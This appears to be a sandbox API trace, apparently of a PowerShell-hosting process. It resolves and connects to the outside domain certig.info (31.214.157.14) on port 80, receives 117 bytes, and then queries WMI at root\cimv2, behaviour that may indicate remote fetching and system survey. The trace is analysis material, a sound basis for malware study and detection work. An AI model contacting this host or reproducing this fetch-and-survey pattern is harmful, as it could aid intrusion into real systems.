	[0246.040] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0246.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee458, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.096] GetLastError () returned 0x0
	[0246.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee408, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.096] GetLastError () returned 0x0
	[0246.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee408, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.096] GetLastError () returned 0x0
	[0246.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee408, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.097] GetLastError () returned 0x0
	[0246.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.404] GetLastError () returned 0xcb
	[0246.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee67c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.627] GetLastError () returned 0x0
	[0246.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee62c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.627] GetLastError () returned 0x0
	[0246.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee62c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.627] GetLastError () returned 0x0
	[0246.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5dee62c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.627] GetLastError () returned 0x0
	[0247.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.500] GetLastError () returned 0xcb
	[0247.698] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4dc
	[0247.698] GetLastError () returned 0x0
	[0257.735] CloseHandle (hObject=0x4dc) returned 1
	[0257.735] GetLastError () returned 0x0
	[0257.783] shutdown (s=0x420, how=2) returned 0
	[0257.784] GetLastError () returned 0x0
	[0257.784] closesocket (s=0x420) returned 0
	[0257.785] GetLastError () returned 0x0
	[0257.929] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5dee6b0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5dee444 | out: ppResult=0x5dee444*=0x7f64d8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x7e7718*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0257.968] GetLastError () returned 0x0
	[0257.968] FreeAddrInfoW (pAddrInfo=0x7f64d8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰ؚ듒⢖", ai_addr=0x7e7718*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0257.968] GetLastError () returned 0x0
	[0257.968] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0257.968] GetLastError () returned 0x0
	[0257.969] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc
	[0257.969] GetLastError () returned 0x0
	[0257.969] WSAConnect (in: s=0x420, name=0x3061974*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0258.237] GetLastError () returned 0x0
	[0258.237] closesocket (s=0x4dc) returned 0
	[0258.237] GetLastError () returned 0x0
	[0258.401] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 117
	[0258.401] GetLastError () returned 0x0
	[0258.405] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0258.495] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee70c | out: ppv=0x5dee70c*=0x718dec) returned 0x0
	[0258.495] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee704 | out: pAptType=0x5dee704*=1) returned 0x0
	[0258.496] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee708 | out: ppvObject=0x5dee708*=0x0) returned 0x80004002
	[0258.496] IUnknown:Release (This=0x718dec) returned 0x1
	[0258.508] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee224 | out: ppv=0x5dee224*=0x6350bf0) returned 0x0
	[0258.509] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee054 | out: ppvObject=0x5dee054*=0x0) returned 0x80004002
	[0258.509] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6350bf0, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee08c | out: ppvObject=0x5dee08c*=0x635d3d8) returned 0x0
	[0258.509] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d3d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede30 | out: ppvObject=0x5dede30*=0x635d3d8) returned 0x0
	[0258.509] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d3d8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddec | out: ppvObject=0x5deddec*=0x0) returned 0x80004002
	[0258.510] WbemDefPath:IUnknown:AddRef (This=0x635d3d8) returned 0x3
	[0258.510] CoGetContextToken (in: pToken=0x5dedc78 | out: pToken=0x5dedc78) returned 0x0
	[0258.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d3d8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc60 | out: ppvObject=0x5dedc60*=0x7ffa28) returned 0x0
	[0258.510] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ffa28, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc68 | out: pCid=0x5dedc68*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.510] WbemDefPath:IUnknown:Release (This=0x7ffa28) returned 0x3
	[0258.510] CoGetContextToken (in: pToken=0x5dedc70 | out: pToken=0x5dedc70) returned 0x0
	[0258.510] WbemDefPath:IUnknown:AddRef (This=0x635d3d8) returned 0x4
	[0258.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d3d8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedce4 | out: ppvObject=0x5dedce4*=0x0) returned 0x80004002
	[0258.511] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x3
	[0258.511] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x2
	[0258.511] WbemDefPath:IUnknown:Release (This=0x6350bf0) returned 0x0
	[0258.511] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x1
	[0258.511] CoGetContextToken (in: pToken=0x5dee520 | out: pToken=0x5dee520) returned 0x0
	[0258.511] CoGetContextToken (in: pToken=0x5dee4e0 | out: pToken=0x5dee4e0) returned 0x0
	[0258.511] WbemDefPath:IUnknown:AddRef (This=0x635d3d8) returned 0x2
	[0258.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d3d8, riid=0x5dee55c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee558 | out: ppvObject=0x5dee558*=0x635d3d8) returned 0x0
	[0258.512] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x2
	[0258.512] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x1
	[0258.512] CoGetContextToken (in: pToken=0x5dee5a0 | out: pToken=0x5dee5a0) returned 0x0
	[0258.512] CoGetContextToken (in: pToken=0x5dee560 | out: pToken=0x5dee560) returned 0x0
	[0258.512] WbemDefPath:IUnknown:AddRef (This=0x635d3d8) returned 0x2
	[0258.512] WbemDefPath:IUnknown:QueryInterface (in: This=0x635d3d8, riid=0x5dee5dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5d8 | out: ppvObject=0x5dee5d8*=0x635d3d8) returned 0x0
	[0258.512] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x2
	[0258.512] WbemDefPath:IUnknown:AddRef (This=0x635d3d8) returned 0x3
	[0258.513] WbemDefPath:IWbemPath:SetText (This=0x635d3d8, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.513] WbemDefPath:IUnknown:Release (This=0x635d3d8) returned 0x2
	[0258.513] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee744 | out: puCount=0x5dee744*=0x2) returned 0x0
	[0258.513] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee740*=0x0, pszText=0x0 | out: puBuffLength=0x5dee740*=0x17, pszText=0x0) returned 0x0
	[0258.513] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee740*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee740*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.513] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee740 | out: puCount=0x5dee740*=0x2) returned 0x0
	[0258.513] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee73c*=0x0, pszText=0x0 | out: puBuffLength=0x5dee73c*=0x17, pszText=0x0) returned 0x0
	[0258.513] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee73c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee73c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.513] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6bc | out: ppv=0x5dee6bc*=0x718dec) returned 0x0
	[0258.513] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6b4 | out: pAptType=0x5dee6b4*=1) returned 0x0
	[0258.513] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6b8 | out: ppvObject=0x5dee6b8*=0x0) returned 0x80004002
	[0258.514] IUnknown:Release (This=0x718dec) returned 0x1
	[0258.514] CoGetClassObject (in: rclsid=0x7b796c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee50c | out: ppv=0x5dee50c*=0x635da10) returned 0x0
	[0258.514] WbemLocator:IUnknown:QueryInterface (in: This=0x635da10, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee33c | out: ppvObject=0x5dee33c*=0x0) returned 0x80004002
	[0258.514] WbemLocator:IClassFactory:CreateInstance (in: This=0x635da10, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x6350bf0) returned 0x0
	[0258.514] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee118 | out: ppvObject=0x5dee118*=0x6350bf0) returned 0x0
	[0258.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dee0d4 | out: ppvObject=0x5dee0d4*=0x0) returned 0x80004002
	[0258.515] WbemLocator:IUnknown:AddRef (This=0x6350bf0) returned 0x3
	[0258.515] CoGetContextToken (in: pToken=0x5dedf60 | out: pToken=0x5dedf60) returned 0x0
	[0258.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedf48 | out: ppvObject=0x5dedf48*=0x0) returned 0x80004002
	[0258.515] CoGetContextToken (in: pToken=0x5dedf58 | out: pToken=0x5dedf58) returned 0x0
	[0258.515] WbemLocator:IUnknown:AddRef (This=0x6350bf0) returned 0x4
	[0258.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedfcc | out: ppvObject=0x5dedfcc*=0x0) returned 0x80004002
	[0258.516] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x3
	[0258.516] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x2
	[0258.516] WbemLocator:IUnknown:Release (This=0x635da10) returned 0x0
	[0258.516] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x1
	[0258.516] CoGetContextToken (in: pToken=0x5dee464 | out: pToken=0x5dee464) returned 0x0
	[0258.516] CoGetContextToken (in: pToken=0x5dee424 | out: pToken=0x5dee424) returned 0x0
	[0258.516] WbemLocator:IUnknown:AddRef (This=0x6350bf0) returned 0x2
	[0258.516] WbemLocator:IUnknown:QueryInterface (in: This=0x6350bf0, riid=0x5dee4a0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dee49c | out: ppvObject=0x5dee49c*=0x6350bf0) returned 0x0
	[0258.516] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x2
	[0258.517] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x1
	[0258.517] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee694 | out: puCount=0x5dee694*=0x2) returned 0x0
	[0258.517] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=8, puBuffLength=0x5dee690*=0x0, pszText=0x0 | out: puBuffLength=0x5dee690*=0x17, pszText=0x0) returned 0x0
	[0258.517] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=8, puBuffLength=0x5dee690*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee690*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.517] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5dee16c | out: ppv=0x5dee16c*=0x635cb70) returned 0x0
	[0258.517] WbemLocator:IWbemLocator:ConnectServer (in: This=0x635cb70, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5dee1b8 | out: ppNamespace=0x5dee1b8*=0x635de2c) returned 0x0
	[0258.646] WbemLocator:IUnknown:QueryInterface (in: This=0x635de2c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee088 | out: ppvObject=0x5dee088*=0x7f8e3c) returned 0x0
	[0258.646] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7f8e3c, pProxy=0x635de2c, pAuthnSvc=0x5dee0d0, pAuthzSvc=0x5dee0cc, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4, pImpLevel=0x5dee0c0, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8 | out: pAuthnSvc=0x5dee0d0*=0xa, pAuthzSvc=0x5dee0cc*=0x0, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4*=0x6, pImpLevel=0x5dee0c0*=0x2, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8*=0x1) returned 0x0
	[0258.646] WbemLocator:IUnknown:Release (This=0x7f8e3c) returned 0x1
	[0258.646] WbemLocator:IUnknown:QueryInterface (in: This=0x635de2c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee07c | out: ppvObject=0x5dee07c*=0x7f8e5c) returned 0x0
	[0258.646] WbemLocator:IUnknown:QueryInterface (in: This=0x635de2c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee078 | out: ppvObject=0x5dee078*=0x7f8e3c) returned 0x0
	[0258.646] WbemLocator:IClientSecurity:SetBlanket (This=0x7f8e3c, pProxy=0x635de2c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.647] WbemLocator:IUnknown:Release (This=0x7f8e3c) returned 0x2
	[0258.647] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x1
	[0258.647] CoTaskMemFree (pv=0x7f8498) 
	[0258.647] WbemLocator:IUnknown:Release (This=0x635cb70) returned 0x0
	[0258.647] WbemLocator:IUnknown:QueryInterface (in: This=0x635de2c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5deda38 | out: ppvObject=0x5deda38*=0x7f8e5c) returned 0x0
	[0258.647] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ded9f4 | out: ppvObject=0x5ded9f4*=0x0) returned 0x80004002
	[0258.674] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x0) returned 0x80004002
	[0258.676] WbemLocator:IUnknown:AddRef (This=0x7f8e5c) returned 0x3
	[0258.676] CoGetContextToken (in: pToken=0x5ded880 | out: pToken=0x5ded880) returned 0x0
	[0258.676] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded868 | out: ppvObject=0x5ded868*=0x7f8dbc) returned 0x0
	[0258.676] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8dbc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded870 | out: pCid=0x5ded870*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.677] WbemLocator:IUnknown:Release (This=0x7f8dbc) returned 0x3
	[0258.677] CoGetContextToken (in: pToken=0x5ded878 | out: pToken=0x5ded878) returned 0x0
	[0258.677] WbemLocator:IUnknown:AddRef (This=0x7f8e5c) returned 0x4
	[0258.677] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8ec | out: ppvObject=0x5ded8ec*=0x7f8e44) returned 0x0
	[0258.677] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x4
	[0258.677] WbemLocator:IRpcOptions:Query (in: This=0x7f8e44, pPrx=0x7f8e5c, dwProperty=2, pdwValue=0x5ded910 | out: pdwValue=0x5ded910) returned 0x80004002
	[0258.677] WbemLocator:IUnknown:Release (This=0x7f8e44) returned 0x3
	[0258.678] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x2
	[0258.678] CoGetContextToken (in: pToken=0x5dedcec | out: pToken=0x5dedcec) returned 0x0
	[0258.678] CoGetContextToken (in: pToken=0x5dedcac | out: pToken=0x5dedcac) returned 0x0
	[0258.678] WbemLocator:IUnknown:AddRef (This=0x7f8e5c) returned 0x3
	[0258.678] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x5dedd28*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dedd24 | out: ppvObject=0x5dedd24*=0x635de2c) returned 0x0
	[0258.678] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x3
	[0258.678] WbemLocator:IUnknown:Release (This=0x635de2c) returned 0x2
	[0258.678] WbemLocator:IUnknown:Release (This=0x635de2c) returned 0x1
	[0258.679] CoGetContextToken (in: pToken=0x5dee608 | out: pToken=0x5dee608) returned 0x0
	[0258.679] WbemLocator:IUnknown:AddRef (This=0x7f8e5c) returned 0x2
